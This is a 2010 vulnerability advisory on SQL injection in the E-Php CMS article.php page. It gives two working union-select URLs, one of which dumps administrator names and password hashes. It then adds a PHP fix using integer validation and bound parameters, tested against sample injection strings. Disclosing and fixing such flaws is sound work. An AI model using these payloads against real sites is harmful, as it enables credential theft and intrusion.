E-Php content management system SQL injection and fix - vulnerability warning - the black bar safety net

2010-11-08T00:00:00
ID MYHACK58:62201028299
Type myhack58
Reporter Anonymous
Modified 2010-11-08T00:00:00

Description

Vulnerability type: SQL injection

Vulnerability description: The article.php page of the E-Php Content Management System (CMS) is vulnerable to SQL injection.

Vulnerability test:

http://target/path/cms/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12

http://target/path/cms/article.php?es_id=-1+union+select+1,group_concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8,9,10,11,12+from+ephpcat_admin

Fix:

Filter the input to the article.php page.
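
One way to apply that filtering, as an added example that is not E-Php's own code: the es_id value is validated as a positive integer and then passed to the query as a bound parameter. The table ephpcat_article, the column es_title and both function names are assumptions, and an in-memory SQLite database with constructed rows stands in for the CMS's database.

```php
<?php
// Added example, not E-Php's code. ephpcat_article and es_title are assumed
// names; only es_id comes from the advisory.
declare(strict_types=1);

// Accept only a plain positive decimal integer; anything else yields null.
function parse_es_id($raw): ?int
{
    if (!is_string($raw) || !preg_match('/\A[1-9][0-9]{0,9}\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Look up one article. Returns null when the id is malformed or not found.
function fetch_article(PDO $db, $raw): ?array
{
    $id = parse_es_id($raw);
    if ($id === null) {
        return null; // no query is run for malformed input
    }
    // Bound parameter: the value never becomes part of the SQL text.
    $stmt = $db->prepare(
        'SELECT es_id, es_title FROM ephpcat_article WHERE es_id = :id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data so the script runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ephpcat_article (es_id INTEGER PRIMARY KEY, es_title TEXT)');
$db->exec("INSERT INTO ephpcat_article VALUES (1, 'Hello')");

// A valid id, then inputs shaped like the test requests above.
$samples = ['1', '-1 union select 1,version(),3', "1' or '1'='1", ''];
foreach ($samples as $raw) {
    $row = fetch_article($db, $raw);
    $out = $row !== null ? $row['es_title'] : 'rejected or not found';
    printf("%-34s => %s\n", var_export($raw, true), $out);
}
```

With a MySQL connection, also set PDO::ATTR_EMULATE_PREPARES to false so the driver sends the statement and the value separately.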